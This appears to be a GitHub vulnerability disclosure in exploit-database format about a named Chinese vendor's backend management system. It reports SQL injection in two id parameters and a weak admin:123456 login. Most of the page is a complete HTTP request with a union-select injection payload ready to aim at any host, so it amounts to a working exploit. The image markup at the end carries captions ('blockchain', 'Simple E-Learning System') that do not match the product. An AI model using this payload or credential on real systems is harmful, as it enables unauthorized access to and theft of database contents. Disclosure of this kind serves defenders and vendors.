Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Exploit Title: SQL injection exists in the background management system /Default/Bd?id and /Default/Page?id of Shaoxing Punctuation Electronic Technology Co., LTD

Date: 2022-12/2

Exploit Author: Peanut886

Vendor Homepage: http://www.xsjczx.com/

Version: background management system of Shaoxing Punctuation Electronic Technology Co., LTD

Tested on: windows10 + phpstudy + burpsuite

Description

Weak password: admin:123456 SQL injection exists in the background management system /Default/Bd?id and /Default/Page?id of Shaoxing Punctuation Electronic Technology Co., LTD

Payload used:

GET /Default/Bd?id=-e7fa628182201505181659430599563%27union%20select%201,2,3,4,5,6,7%20--+ HTTP/1.1
Host: TARGET:PORT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=pjcyha1p55kts5fkgesrgehn
Upgrade-Insecure-Requests: 1

Returns part of the package

![blockchain](https://github.com/Peanut886/Vulnerability/blob/main/imgs/2022-12-2-1.jpg https://github.com/Peanut886/Vulnerability/blob/main/imgs/2022-12-2-2.jpg https://github.com/Peanut886/Vulnerability/blob/main/imgs/2022-12-2-3.jpg "Simple E-Learning System")